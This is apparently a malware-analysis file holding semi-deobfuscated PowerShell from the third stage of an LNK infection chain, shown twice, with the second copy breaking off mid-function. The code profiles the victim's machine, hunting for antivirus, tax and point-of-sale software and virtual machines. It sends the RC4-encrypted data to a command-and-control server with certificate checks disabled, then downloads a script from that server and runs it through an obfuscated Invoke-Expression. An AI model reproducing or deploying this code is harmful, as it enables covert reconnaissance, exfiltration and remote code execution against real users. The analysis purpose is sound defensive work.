jdferrell3/lnk_powershell_stage3_deobfuscated

## lnk_powershell_stage3_deobfuscated
# Semi-deobfuscated PowerShell from malware analysis

function sdnfjshdklfhlj {
 $ag = @{
   srv = ("{3}{1}{0}{2}{4}{5}"-f '.','//YYY','Y','http:','Y.YYY','.YYY');
   skkey = 'b[CgNFd8=sSQ{YsBcX6|PJ+A~w?#LEKH';
   usag = (("{3}{9}{12}{14}{0}{18}{11}{7}{5}{16}{20}{23}{1}{8}{19}{6}{10}{22}{15}{2}{4}{21}{13}{17}"-f 'NT 6.1;','o); OPR/4','.0.3282.1','Mozilla/5','19; ','WebKit/5','44; Ch','ple','3.','.0 (Wi','rome','; x64) Ap','ndow','5','s ','64','37.36','37.36',' Win64','0.2441.11',' (KHTML, like ','Safari/','/','Geck'));
   conType = ("{1}{0}{4}{2}{3}"-f 'pl','ap','ion/x','ml','icat')
   reffer = ("{9}{2}{4}{7}{3}{8}{0}{10}{11}{5}{6}{12}{1}"-f 'oft','x','/www.u','i','pdate','/d','oc','.m','cros','https:/','.','com','s.asp');
   encutf = [System.Text.Encoding]::UTF8;
   pref = ("{0}{1}"-f'g','ata=');
   ver = ("{1}{2}{0}" -f '0.9','p.','1.')
   }
   $Null = [Reflection.Assembly]::LoadWithPartialName(("{0}{1}{2}" -f 'System','.Sec','urity'));
   $Null = [Reflection.Assembly]::LoadWithPartialName(("{0}{2}{1}" -f'Sy','.Core','stem'));
 $ErrorActionPreference = ("{3}{1}{2}{0}"-f'nue','ent','lyConti','Sil');

function Test-Administrator
 {
   $user = [Security.Principal.WindowsIdentity]::GetCurrent();
   (New-Object Security.Principal.WindowsPrincipal $user).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)
 }

function Get-Soft {
  param (
    [Parameter(ValueFromPipeline=$true)]
    [string[]]$ComputerName = $env:COMPUTERNAME,
    # NameRegex = (Opera|Firefox|Chrome|TAX|OLT|LACERTE|PROSERIES|Virus|Firewall|Defender|Secury|Anti|Comodo|Kasper|Protect|Point of Sale|POS)
    [string]$NameRegex = ((("{13}{5}{7}{30}{16}{4}{18}{10}{8}{26}{11}{21}{24}{6}{23}{2}{3}{19}{20}{1}{14}{29}{0}{12}{28}{15}{22}{27}{25}{17}{9}"-f'do','ntiX','RgSec','ury','LACERTEXRgPROSERIES','RgFire','nde','foxXRgChr','XR','OS)','us','ire','XRgKasperXRgProtec','(OperaX','Rg',' of ','XRgTAXXRgOLTXRg','gP','XRgVir','X','RgA','wallXRg','Sale','rX','Defe','R','gF','X','tXRgPoint','Como','ome')).REpLace(([ChAR]88+[ChAR]82+[ChAR]103),[StRING][ChAR]124))
  )
  foreach ($comp in $ComputerName) {
    $keys = '',((("{2}{3}{4}{1}{0}" -f 'Node','32','{0','}','Wow64')) -f [CHAr]92)
    foreach ($key in $keys) {
      try {
        $apps = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey(("{0}{1}{2}" -f 'LocalMa','c','hine'),$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall").GetSubKeyNames()
      } catch {
        continue
      }
      foreach ($app in $apps) {
        $program = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey(("{1}{0}{2}" -f'alMac','Loc','hine'),$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall\$app")
        $name = $program.GetValue(("{0}{2}{1}" -f'Displ','ame','ayN'))
        $str = ''
        if ($name -and $name -match $NameRegex) {
          $str += $name + ';'
          $str
        }
      }
    }
  }
}

function Get-AV {
  try {
    Get-WmiObject -Namespace ((("{3}{0}{4}{1}{5}{2}"-f 'ootM','Se','yCenter2','r','lV','curit')).REPLace(([Char]77+[Char]108+[Char]86),[STRing][Char]92)) -Class AntiVirusProduct -ComputerName $env:computername | % { $e += $_.displayName + ';'}
    if ($e){
     $e[0..($e.Length-2)]-join''
    }else{
     "N/A"
    }
  } catch {
    "N/A"
  } finally {
    [GC]::Collect()
  }
}

function Get-CPU {
  try {
    Get-WmiObject -Namespace ((("{2}{0}{1}" -f'rCI','MV2','rootxa')).rEPLacE('xar',[STrING][cHAr]92)) -Class Win32_Processor -ComputerName $env:computername | % { $e += $_.Name + ';'}
    $e[0..($e.Length-2)]-join''
  }
  catch {"N/A"}
  finally{[GC]::Collect()}
}

function SysMachineID {
  $HashName = "MD5"
  [string]$ret = ""
  $hd = gwmi win32_bios
  $ret = $hd[("{2}{1}{0}"-f 'umber','rialN','Se')].ToString()
  [string]$String = $([Environment]::UserName +[Environment]::MachineName + $ret).ToLower();
  $StringBuilder = New-Object System.Text.StringBuilder
  [System.Security.Cryptography.HashAlgorithm]::Create($HashName).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($String))|%{
    [Void]$StringBuilder.Append($_.ToString("x2"))
  }
  $StringBuilder.ToString().ToLower()
}

function HasGet-Bretring($ht) {
  $first = $true
  foreach($pair in $ht.GetEnumerator()) {
    if ($first) {
      $first = $false
    } else {
      $output += ';'
    }
    $output+="{0}" -f $($pair.Value)
  }
  $output
}

function Get-workconfig {
  Get-WmiObject Win32_NetworkAdapter -Filter ("{5}{3}{4}{0}{6}{2}{1}" -f 'nSt','2','tus=','Connec','tio','Net','a') |
  ForEach-Object {
    $result = 1 | Select-Object Name, IP, MAC, ID
    $result.Name = $_.Name
    $result.MAC = $_.MacAddress
    $result.ID = $_.DeviceID
    $config = $_.GetRelated(("{5}{6}{3}{7}{0}{2}{1}{4}"-f'a','C','pter','et','onfiguration','Wi','n32_N','workAd'))
    $result.IP = $config | Select-Object -expand IPAddress
    $result
  }
}

function SysMachineinfo {
  $str = [Environment]::UserDomainName+'|'+[Environment]::UserName+'|'+[Environment]::MachineName;
  $string = ""
  foreach($c in Get-workconfig) {
    [string]$lanname = $c.Name; [string]$macadr = $c.MAC; [string]$ID = $c.ID
    $ip = @{$true=$c.IP[0];$false=$p.IP}[$c.IP.Length -lt 6];
    [string]$ip = $c.IP[0];
    if(!$ip -or $ip.trim() -eq '') {
      $ip=("{2}{0}{1}" -f '0','.0','0.0.')
    };
    $lanconf = @{
      id = $ID
      ip = $ip;
      mac = $macadr;
      name = $lanname;
      }
    $string += HasGet-Bretring $lanconf
  }

  $str += "|$string";
  $str += '|' + $(Get-WmiObject -class Win32_OperatingSystem).Caption
  if(([Environment]::UserName).ToLower() -eq ("{0}{1}"-f'syste','m')) {
    $str += (('3GyTrue') -replACe'3Gy',[ChAR]124)
  } else {
    $str += '|'+ $(Test-Administrator)
  }
  [void] [Reflection.Assembly]::LoadWithPartialName(("{2}{4}{3}{5}{1}{0}" -f'ws.Forms','ndo','S','m.W','yste','i'))
  $Screens = [system.windows.forms.screen]::AllScreens
  foreach ($Screen in $Screens) {
    $Width = $Screen.Bounds.Width
    $Height = $Screen.Bounds.Height
  }
  $str += '|' + "$Width`x$Height"
  $n = [System.Diagnostics.Process]::GetCurrentProcess()
  $str += '|'+ $n.ProcessName+'|'+$n.Id
  $str += '|' + $PSVersionTable.PSVersion.Major
  $str += '|' + (Get-WmiObject -class Win32_OperatingSystem).OSArchitecture
  $str += '|' + (gwmi win32_timeZone -ComputerName $env:ComputerName).caption
  $str += '|' + $(Get-SystemUptime)
  $str += '|' + $(Get-CPU)
  $str += '|' + $ag['ver']
  $str += '|' + ([Math]::Round((Get-WmiObject -Class win32_computersystem).TotalPhysicalMemory/1Gb)).toString()
  $str += '|' + $(Get-AV)
  $str += '|' + $(IsVirtual)
  $str.split('|') |% {$e += "inf=$_|"}
  $e[0..($e.Length-2)]-join''
}

function Get-SystemUptime {
  $lastboot = [System.Management.ManagementDateTimeconverter]::ToDateTime("$((gwmi Win32_OperatingSystem).LastBootUpTime) ")
  $uptime = (Get-Date) - $lastboot
  return (($uptime.days).ToString()+"d:"+($uptime.hours).ToString()+"h:"+$uptime.minutes.ToString()+"m:"+($uptime.seconds).ToString()+"s")
 }

Function IsVirtual
  {
  $wmibios = Get-WmiObject Win32_BIOS -ErrorAction Stop | Select-Object version,serialnumber
  $wmisystem = Get-WmiObject Win32_ComputerSystem -ErrorAction Stop | Select-Object model,manufacturer
  $ResultProps = @{
    ComputerName = $computer
    BIOSVersion = $wmibios.Version
    SerialNumber = $wmibios.serialnumber
    Manufacturer = $wmisystem.manufacturer
    Model = $wmisystem.model
    IsVirtual = $false
    VirtualType = $null
  }
  if ($wmibios.SerialNumber -like ("{1}{0}"-f 'VMware*','*')) {
    $ResultProps.IsVirtual = $true
    $ResultProps.VirtualType = ("{0}{2}{3}{4}{1}"-f'Virt','Ware','ual ','- V','M')
  }
  else {
    switch -wildcard ($wmibios.Version) {
      ("{1}{0}" -f 'TUAL','VIR') {
          $ResultProps.IsVirtual = $true
          $ResultProps.VirtualType = ("{1}{3}{4}{0}{2}"-f ' - Hy','Vi','per-V','rtua','l')
      }
      ("{0}{1}"-f 'A',' M I') {
          $ResultProps.IsVirtual = $true
          $ResultProps.VirtualType = ("{1}{2}{6}{5}{3}{0}{4}"-f'ual ','Virt','ua','rt','PC',' - Vi','l')
      }
      ("{1}{0}"-f'*','*Xen') {
          $ResultProps.IsVirtual = $true
          $ResultProps.VirtualType = ("{1}{3}{2}{0}"-f'al - Xen','Vi','tu','r')
      }
    }
  }
  if (-not $ResultProps.IsVirtual) {
    if ($wmisystem.manufacturer -like ("{2}{1}{0}"-f't*','osof','*Micr'))
    {
      $ResultProps.IsVirtual = $true
      $ResultProps.VirtualType = ("{1}{0}{2}{3}" -f ' - Hy','Virtual','p','er-V')
    }
    elseif ($wmisystem.manufacturer -like ("{1}{0}{2}" -f 'ar','*VMW','e*'))
    {
      $ResultProps.IsVirtual = $true
      $ResultProps.VirtualType = ("{3}{2}{0}{1}" -f 'l - VMW','are','rtua','Vi')
    }
    elseif ($wmisystem.model -like ("{2}{1}{0}"-f'ual*','irt','*V')) {
      $ResultProps.IsVirtual = $true
      $ResultProps.VirtualType = ("{1}{3}{4}{0}{2}"-f 'ch','Unknown Virtu','ine','al ','Ma')
    }
  }
  $results += New-Object PsObject -Property $ResultProps
  return $ResultProps.IsVirtual
}

function vzuhdata{
  # encutf
  $buffer = $ag[("{1}{0}" -f'cutf','en')].GetBytes($args[0])
  try {
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};
    [SysTEm.Net.SeRvICePoIntMAnaGEr]::Expect100ConTINuE=0;
    # http://YYY.YY.YYY.YYY/ltjzhcbutq/ozxvgzfxkvm/vcubhhhqmtefvdjywrrylhqmxh.php
    $urr = $($ag['srv'] + '/' + $($u={sal er Get-Random;$(-join(1..$(er -Minimum 7 -Maximum 37)|%{[char][int]((65..90)+(97..122)|er)})).ToLower()};'{0}/{1}/{2}.{3}' -f $(. $u), $(. $u), $(. $u), $(@('php','jsp','asp')| Get-Random)))
    [System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create($urr)
    $webRequest.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
    $webRequest.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
    $webRequest.Timeout = 600000;
    $webRequest.Method = ("{0}{1}"-f 'POS','T')
    $webRequest.UserAgent = $ag[("{1}{0}"-f 'ag','us')]
    $webRequest.Headers.Add(("{1}{0}"-f 'okie','Co'), $ag[("{1}{0}" -f 'id','se')])
    $webRequest.ContentType = $ag[("{1}{2}{0}" -f'pe','co','nTy')]
    $webRequest.Referer = $ag[("{1}{0}" -f'effer','r')]
    $webRequest.ContentLength = $buffer.Length

    $requestStream = $webRequest.GetRequestStream()
    $requestStream.Write($buffer, 0, $buffer.Length)
    $requestStream.Flush()
    $requestStream.Close()

    [System.Net.HttpWebResponse] $webResponse = $webRequest.GetResponse()
    $streamReader = New-Object System.IO.StreamReader($webResponse.GetResponseStream())
    $result = $streamReader.ReadToEnd()
    $webResponse.Close()
    $result
  } catch {
    $_.Exception.Message
  }
}

function getexteip {
  [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};
  [SysTEm.Net.SeRvICePoIntMAnaGEr]::Expect100ConTINuE=0;
  $Wc=New-ObJeCt SYsTEM.NET.WeBCliENt;
  $u=("{3}{17}{6}{12}{7}{8}{5}{15}{11}{18}{14}{0}{4}{13}{16}{19}{1}{9}{2}{10}" -f ' ','nfoPa','1','Mozill','S','0; Wind','/4.0 (',' M','SIE 6.','th.',')',' ','compatible;','V1;',' 5.1;','ows',' ','a','NT','I');
  $Wc.HeADeRS.AdD(("{0}{2}{1}" -f 'Use','nt','r-Age'),$u);
  $Wc.Proxy=[SYSTem.NEt.WEBREQUeSt]::DefAulTWebPRoXY;
  $WC.PRoXy.CReDEntIALs=[SYsTEM.NET.CReDentIAlCAcHe]::DefaUlTNetwoRKCREdENTIalS;
  $rr = $Wc.DoWnloaDSTRIng(("{2}{1}{5}{0}{6}{3}{4}"-f'info/h','ttp','h','chec','ker.php','s://ipinfo.','tml/ip_'));
  $regex = [regex]'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'; $($regex.Matches($rr)).value
}

function rc4 {
     param([Byte[]]$data,[Byte[]]$key)
     [Byte[]]$buffer = New-Object Byte[] $data.Length;$data.CopyTo($buffer, 0);[Byte[]]$s = New-Object Byte[] 256;[Byte[]]$k = New-Object Byte[] 256;
     for ($i = 0; $i -lt 256; $i++){$s[$i] = [Byte]$i;$k[$i] = $key[$i % $key.Length];}
     $j = 0;for ($i = 0; $i -lt 256; $i++){$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;};$i = $j = 0;
     for ($x = 0; $x -lt $buffer.Length; $x++){$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;[int]$t = ($s[$i] + $s[$j]) % 256;$buffer[$x] = $buffer[$x] -bxor $s[$t];}
     return $buffer
}

function Encrypt {
   param([string]$data)

   [Convert]::ToBase64String($(rc4 $ag[("{1}{0}" -f 'f','encut')].GetBytes($data) $ag[("{1}{0}" -f'cutf','en')].GetBytes($ag[("{1}{0}"-f 'kkey','s')])))
}

function Decrypt {
   param([string]$data)

   $ag[("{1}{2}{0}"-f'f','e','ncut')].GetString($(rc4 $([System.Convert]::FromBase64String($data)) $ag[("{0}{1}"-f 'enc','utf')].GetBytes($ag[("{0}{1}"-f 'skk','ey')])))
}

function get-construct {
     param([string]$out)
   $ag.add(("{0}{1}"-f'ske','y'), $($out[($out.length-33)..($out.length-2)]-join ''))
   $ag.add('scr', $($out[0..($out.length-34)]-join ''))
}

# seid, routed
$ag.add(("{0}{1}"-f'sei','d'), ("{1}{0}{2}"-f 'out','r','ed:') + $(Encrypt $(SysMachineID)));
if (Test-Administrator) {
    $eb='p=1'
  } else {
    $eb='p=0'
  }
$de = Decrypt $(vzuhdata $($($ag[("{0}{1}"-f'p','ref')] + $(Encrypt $(((("{1}{0}{2}"-f'a','act=p','ll{0}')) -F [CHAr]124)+ $eb + ((("{2}{1}{0}" -f'r=','e','HDYv')).REpLACe('HDY','|'))+ $ag['ver'] + ((("{1}{0}"-f'aopcn=','O')).rePLACe('Oao',[strInG][cHar]124)) + $PSVersionTable.PSVersion.Major)))))
$k=$de[$de.length-1] -join ''
if ($k -eq 0) {
  get-construct $(Decrypt $(vzuhdata $($ag[("{0}{1}" -f'pr','ef')] + $(Encrypt $(((("{0}{1}{2}"-f'act','=fallK','ik')) -RePLaCE ([CHAR]75+[CHAR]105+[CHAR]107),[CHAR]124)+ $(SysMachineinfo))))))
  } else {
    get-construct $de
  }
 . ($eNV:coMsPec[4,26,25]-JoIN'') $ag['scr'];
 $de=$null;
 $ag.Remove('scr');
 $ag.Remove(("{0}{1}" -f 'p','ref'));
 $ag.Remove(("{1}{0}" -f 'key','sk'));
 $ag.Remove('ver');
 $ag.Remove(("{0}{1}" -f 'encut','f'))
 $Error.Clear()
 [GC]::Collect()
 [GC]::WaitForPendingFinalizers()
 Get-federerfegegfeg $ag
}
sdnfjshdklfhlj
	# Semi-deobfuscated PowerShell from malware analysis

	function sdnfjshdklfhlj {
	$ag = @{
	srv = ("{3}{1}{0}{2}{4}{5}"-f '.','//YYY','Y','http:','Y.YYY','.YYY');
	skkey = 'b[CgNFd8=sSQ{YsBcX6\|PJ+A~w?#LEKH';
	usag = (("{3}{9}{12}{14}{0}{18}{11}{7}{5}{16}{20}{23}{1}{8}{19}{6}{10}{22}{15}{2}{4}{21}{13}{17}"-f 'NT 6.1;','o); OPR/4','.0.3282.1','Mozilla/5','19; ','WebKit/5','44; Ch','ple','3.','.0 (Wi','rome','; x64) Ap','ndow','5','s ','64','37.36','37.36',' Win64','0.2441.11',' (KHTML, like ','Safari/','/','Geck'));
	conType = ("{1}{0}{4}{2}{3}"-f 'pl','ap','ion/x','ml','icat')
	reffer = ("{9}{2}{4}{7}{3}{8}{0}{10}{11}{5}{6}{12}{1}"-f 'oft','x','/www.u','i','pdate','/d','oc','.m','cros','https:/','.','com','s.asp');
	encutf = [System.Text.Encoding]::UTF8;
	pref = ("{0}{1}"-f'g','ata=');
	ver = ("{1}{2}{0}" -f '0.9','p.','1.')
	}
	$Null = [Reflection.Assembly]::LoadWithPartialName(("{0}{1}{2}" -f 'System','.Sec','urity'));
	$Null = [Reflection.Assembly]::LoadWithPartialName(("{0}{2}{1}" -f'Sy','.Core','stem'));
	$ErrorActionPreference = ("{3}{1}{2}{0}"-f'nue','ent','lyConti','Sil');

	function Test-Administrator
	{
	$user = [Security.Principal.WindowsIdentity]::GetCurrent();
	(New-Object Security.Principal.WindowsPrincipal $user).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)
	}

	function Get-Soft {
	param (
	[Parameter(ValueFromPipeline=$true)]
	[string[]]$ComputerName = $env:COMPUTERNAME,
	# NameRegex = (Opera\|Firefox\|Chrome\|TAX\|OLT\|LACERTE\|PROSERIES\|Virus\|Firewall\|Defender\|Secury\|Anti\|Comodo\|Kasper\|Protect\|Point of Sale\|POS)
	[string]$NameRegex = ((("{13}{5}{7}{30}{16}{4}{18}{10}{8}{26}{11}{21}{24}{6}{23}{2}{3}{19}{20}{1}{14}{29}{0}{12}{28}{15}{22}{27}{25}{17}{9}"-f'do','ntiX','RgSec','ury','LACERTEXRgPROSERIES','RgFire','nde','foxXRgChr','XR','OS)','us','ire','XRgKasperXRgProtec','(OperaX','Rg',' of ','XRgTAXXRgOLTXRg','gP','XRgVir','X','RgA','wallXRg','Sale','rX','Defe','R','gF','X','tXRgPoint','Como','ome')).REpLace(([ChAR]88+[ChAR]82+[ChAR]103),[StRING][ChAR]124))
	)
	foreach ($comp in $ComputerName) {
	$keys = '',((("{2}{3}{4}{1}{0}" -f 'Node','32','{0','}','Wow64')) -f [CHAr]92)
	foreach ($key in $keys) {
	try {
	$apps = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey(("{0}{1}{2}" -f 'LocalMa','c','hine'),$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall").GetSubKeyNames()
	} catch {
	continue
	}
	foreach ($app in $apps) {
	$program = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey(("{1}{0}{2}" -f'alMac','Loc','hine'),$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall\$app")
	$name = $program.GetValue(("{0}{2}{1}" -f'Displ','ame','ayN'))
	$str = ''
	if ($name -and $name -match $NameRegex) {
	$str += $name + ';'
	$str
	}
	}
	}
	}
	}

	function Get-AV {
	try {
	Get-WmiObject -Namespace ((("{3}{0}{4}{1}{5}{2}"-f 'ootM','Se','yCenter2','r','lV','curit')).REPLace(([Char]77+[Char]108+[Char]86),[STRing][Char]92)) -Class AntiVirusProduct -ComputerName $env:computername \| % { $e += $_.displayName + ';'}
	if ($e){
	$e[0..($e.Length-2)]-join''
	}else{
	"N/A"
	}
	} catch {
	"N/A"
	} finally {
	[GC]::Collect()
	}
	}

	function Get-CPU {
	try {
	Get-WmiObject -Namespace ((("{2}{0}{1}" -f'rCI','MV2','rootxa')).rEPLacE('xar',[STrING][cHAr]92)) -Class Win32_Processor -ComputerName $env:computername \| % { $e += $_.Name + ';'}
	$e[0..($e.Length-2)]-join''
	}
	catch {"N/A"}
	finally{[GC]::Collect()}
	}

	function SysMachineID {
	$HashName = "MD5"
	[string]$ret = ""
	$hd = gwmi win32_bios
	$ret = $hd[("{2}{1}{0}"-f 'umber','rialN','Se')].ToString()
	[string]$String = $([Environment]::UserName +[Environment]::MachineName + $ret).ToLower();
	$StringBuilder = New-Object System.Text.StringBuilder
	[System.Security.Cryptography.HashAlgorithm]::Create($HashName).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($String))\|%{
	[Void]$StringBuilder.Append($_.ToString("x2"))
	}
	$StringBuilder.ToString().ToLower()
	}

	function HasGet-Bretring($ht) {
	$first = $true
	foreach($pair in $ht.GetEnumerator()) {
	if ($first) {
	$first = $false
	} else {
	$output += ';'
	}
	$output+="{0}" -f $($pair.Value)
	}
	$output
	}

	function Get-workconfig {
	Get-WmiObject Win32_NetworkAdapter -Filter ("{5}{3}{4}{0}{6}{2}{1}" -f 'nSt','2','tus=','Connec','tio','Net','a') \|
	ForEach-Object {
	$result = 1 \| Select-Object Name, IP, MAC, ID
	$result.Name = $_.Name
	$result.MAC = $_.MacAddress
	$result.ID = $_.DeviceID
	$config = $_.GetRelated(("{5}{6}{3}{7}{0}{2}{1}{4}"-f'a','C','pter','et','onfiguration','Wi','n32_N','workAd'))
	$result.IP = $config \| Select-Object -expand IPAddress
	$result
	}
	}

	function SysMachineinfo {
	$str = [Environment]::UserDomainName+'\|'+[Environment]::UserName+'\|'+[Environment]::MachineName;
	$string = ""
	foreach($c in Get-workconfig) {
	[string]$lanname = $c.Name; [string]$macadr = $c.MAC; [string]$ID = $c.ID
	$ip = @{$true=$c.IP[0];$false=$p.IP}[$c.IP.Length -lt 6];
	[string]$ip = $c.IP[0];
	if(!$ip -or $ip.trim() -eq '') {
	$ip=("{2}{0}{1}" -f '0','.0','0.0.')
	};
	$lanconf = @{
	id = $ID
	ip = $ip;
	mac = $macadr;
	name = $lanname;
	}
	$string += HasGet-Bretring $lanconf
	}

	$str += "\|$string";
	$str += '\|' + $(Get-WmiObject -class Win32_OperatingSystem).Caption
	if(([Environment]::UserName).ToLower() -eq ("{0}{1}"-f'syste','m')) {
	$str += (('3GyTrue') -replACe'3Gy',[ChAR]124)
	} else {
	$str += '\|'+ $(Test-Administrator)
	}
	[void] [Reflection.Assembly]::LoadWithPartialName(("{2}{4}{3}{5}{1}{0}" -f'ws.Forms','ndo','S','m.W','yste','i'))
	$Screens = [system.windows.forms.screen]::AllScreens
	foreach ($Screen in $Screens) {
	$Width = $Screen.Bounds.Width
	$Height = $Screen.Bounds.Height
	}
	$str += '\|' + "$Width`x$Height"
	$n = [System.Diagnostics.Process]::GetCurrentProcess()
	$str += '\|'+ $n.ProcessName+'\|'+$n.Id
	$str += '\|' + $PSVersionTable.PSVersion.Major
	$str += '\|' + (Get-WmiObject -class Win32_OperatingSystem).OSArchitecture
	$str += '\|' + (gwmi win32_timeZone -ComputerName $env:ComputerName).caption
	$str += '\|' + $(Get-SystemUptime)
	$str += '\|' + $(Get-CPU)
	$str += '\|' + $ag['ver']
	$str += '\|' + ([Math]::Round((Get-WmiObject -Class win32_computersystem).TotalPhysicalMemory/1Gb)).toString()
	$str += '\|' + $(Get-AV)
	$str += '\|' + $(IsVirtual)
	$str.split('\|') \|% {$e += "inf=$_\|"}
	$e[0..($e.Length-2)]-join''
	}

	function Get-SystemUptime {
	$lastboot = [System.Management.ManagementDateTimeconverter]::ToDateTime("$((gwmi Win32_OperatingSystem).LastBootUpTime) ")
	$uptime = (Get-Date) - $lastboot
	return (($uptime.days).ToString()+"d:"+($uptime.hours).ToString()+"h:"+$uptime.minutes.ToString()+"m:"+($uptime.seconds).ToString()+"s")
	}

	Function IsVirtual
	{
	$wmibios = Get-WmiObject Win32_BIOS -ErrorAction Stop \| Select-Object version,serialnumber
	$wmisystem = Get-WmiObject Win32_ComputerSystem -ErrorAction Stop \| Select-Object model,manufacturer
	$ResultProps = @{
	ComputerName = $computer
	BIOSVersion = $wmibios.Version
	SerialNumber = $wmibios.serialnumber
	Manufacturer = $wmisystem.manufacturer
	Model = $wmisystem.model
	IsVirtual = $false
	VirtualType = $null
	}
	if ($wmibios.SerialNumber -like ("{1}{0}"-f 'VMware','')) {
	$ResultProps.IsVirtual = $true
	$ResultProps.VirtualType = ("{0}{2}{3}{4}{1}"-f'Virt','Ware','ual ','- V','M')
	}
	else {
	switch -wildcard ($wmibios.Version) {
	("{1}{0}" -f 'TUAL','VIR') {
	$ResultProps.IsVirtual = $true
	$ResultProps.VirtualType = ("{1}{3}{4}{0}{2}"-f ' - Hy','Vi','per-V','rtua','l')
	}
	("{0}{1}"-f 'A',' M I') {
	$ResultProps.IsVirtual = $true
	$ResultProps.VirtualType = ("{1}{2}{6}{5}{3}{0}{4}"-f'ual ','Virt','ua','rt','PC',' - Vi','l')
	}
	("{1}{0}"-f'','Xen') {
	$ResultProps.IsVirtual = $true
	$ResultProps.VirtualType = ("{1}{3}{2}{0}"-f'al - Xen','Vi','tu','r')
	}
	}
	}
	if (-not $ResultProps.IsVirtual) {
	if ($wmisystem.manufacturer -like ("{2}{1}{0}"-f't','osof','Micr'))
	{
	$ResultProps.IsVirtual = $true
	$ResultProps.VirtualType = ("{1}{0}{2}{3}" -f ' - Hy','Virtual','p','er-V')
	}
	elseif ($wmisystem.manufacturer -like ("{1}{0}{2}" -f 'ar','VMW','e'))
	{
	$ResultProps.IsVirtual = $true
	$ResultProps.VirtualType = ("{3}{2}{0}{1}" -f 'l - VMW','are','rtua','Vi')
	}
	elseif ($wmisystem.model -like ("{2}{1}{0}"-f'ual','irt','V')) {
	$ResultProps.IsVirtual = $true
	$ResultProps.VirtualType = ("{1}{3}{4}{0}{2}"-f 'ch','Unknown Virtu','ine','al ','Ma')
	}
	}
	$results += New-Object PsObject -Property $ResultProps
	return $ResultProps.IsVirtual
	}

	function vzuhdata{
	# encutf
	$buffer = $ag[("{1}{0}" -f'cutf','en')].GetBytes($args[0])
	try {
	[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};
	[SysTEm.Net.SeRvICePoIntMAnaGEr]::Expect100ConTINuE=0;
	# http://YYY.YY.YYY.YYY/ltjzhcbutq/ozxvgzfxkvm/vcubhhhqmtefvdjywrrylhqmxh.php
	$urr = $($ag['srv'] + '/' + $($u={sal er Get-Random;$(-join(1..$(er -Minimum 7 -Maximum 37)\|%{[char][int]((65..90)+(97..122)\|er)})).ToLower()};'{0}/{1}/{2}.{3}' -f $(. $u), $(. $u), $(. $u), $(@('php','jsp','asp')\| Get-Random)))
	[System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create($urr)
	$webRequest.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
	$webRequest.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
	$webRequest.Timeout = 600000;
	$webRequest.Method = ("{0}{1}"-f 'POS','T')
	$webRequest.UserAgent = $ag[("{1}{0}"-f 'ag','us')]
	$webRequest.Headers.Add(("{1}{0}"-f 'okie','Co'), $ag[("{1}{0}" -f 'id','se')])
	$webRequest.ContentType = $ag[("{1}{2}{0}" -f'pe','co','nTy')]
	$webRequest.Referer = $ag[("{1}{0}" -f'effer','r')]
	$webRequest.ContentLength = $buffer.Length

	$requestStream = $webRequest.GetRequestStream()
	$requestStream.Write($buffer, 0, $buffer.Length)
	$requestStream.Flush()
	$requestStream.Close()

	[System.Net.HttpWebResponse] $webResponse = $webRequest.GetResponse()
	$streamReader = New-Object System.IO.StreamReader($webResponse.GetResponseStream())
	$result = $streamReader.ReadToEnd()
	$webResponse.Close()
	$result
	} catch {
	$_.Exception.Message
	}
	}

	function getexteip {
	[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};
	[SysTEm.Net.SeRvICePoIntMAnaGEr]::Expect100ConTINuE=0;
	$Wc=New-ObJeCt SYsTEM.NET.WeBCliENt;
	$u=("{3}{17}{6}{12}{7}{8}{5}{15}{11}{18}{14}{0}{4}{13}{16}{19}{1}{9}{2}{10}" -f ' ','nfoPa','1','Mozill','S','0; Wind','/4.0 (',' M','SIE 6.','th.',')',' ','compatible;','V1;',' 5.1;','ows',' ','a','NT','I');
	$Wc.HeADeRS.AdD(("{0}{2}{1}" -f 'Use','nt','r-Age'),$u);
	$Wc.Proxy=[SYSTem.NEt.WEBREQUeSt]::DefAulTWebPRoXY;
	$WC.PRoXy.CReDEntIALs=[SYsTEM.NET.CReDentIAlCAcHe]::DefaUlTNetwoRKCREdENTIalS;
	$rr = $Wc.DoWnloaDSTRIng(("{2}{1}{5}{0}{6}{3}{4}"-f'info/h','ttp','h','chec','ker.php','s://ipinfo.','tml/ip_'));
	$regex = [regex]'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'; $($regex.Matches($rr)).value
	}

	function rc4 {
	param([Byte[]]$data,[Byte[]]$key)
	[Byte[]]$buffer = New-Object Byte[] $data.Length;$data.CopyTo($buffer, 0);[Byte[]]$s = New-Object Byte[] 256;[Byte[]]$k = New-Object Byte[] 256;
	for ($i = 0; $i -lt 256; $i++){$s[$i] = [Byte]$i;$k[$i] = $key[$i % $key.Length];}
	$j = 0;for ($i = 0; $i -lt 256; $i++){$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;};$i = $j = 0;
